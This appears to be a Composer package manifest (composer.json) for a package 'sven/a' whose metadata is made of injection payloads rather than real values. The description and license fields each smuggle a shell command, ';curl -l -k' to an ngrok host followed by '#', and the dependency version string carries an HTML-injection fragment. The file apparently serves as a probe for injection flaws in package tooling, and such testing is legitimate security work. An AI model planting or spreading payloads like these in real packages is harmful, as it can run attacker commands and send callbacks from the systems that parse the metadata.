{
  "name": "sven/a",
  "description": "sven/;curl -l -k 7baf-212-112-155-18.ngrok-free.app;#",
  "type": "bier",
  "require": {
      "hellogerard/jobby": "dev-master\"><input>"
  },
  "license": "sven/;curl -l -k 7baf-212-112-155-18.ngrok-free.app;#",
  "autoload": {
      "psr-4": {
          "Sven\\A\\": "src/"
      }
  },
  "authors": [
      {
          "name": "Sven Grossmann",
          "email": "svennergr@gmail.com"
      }
  ],
  "minimum-stability": "dev"
}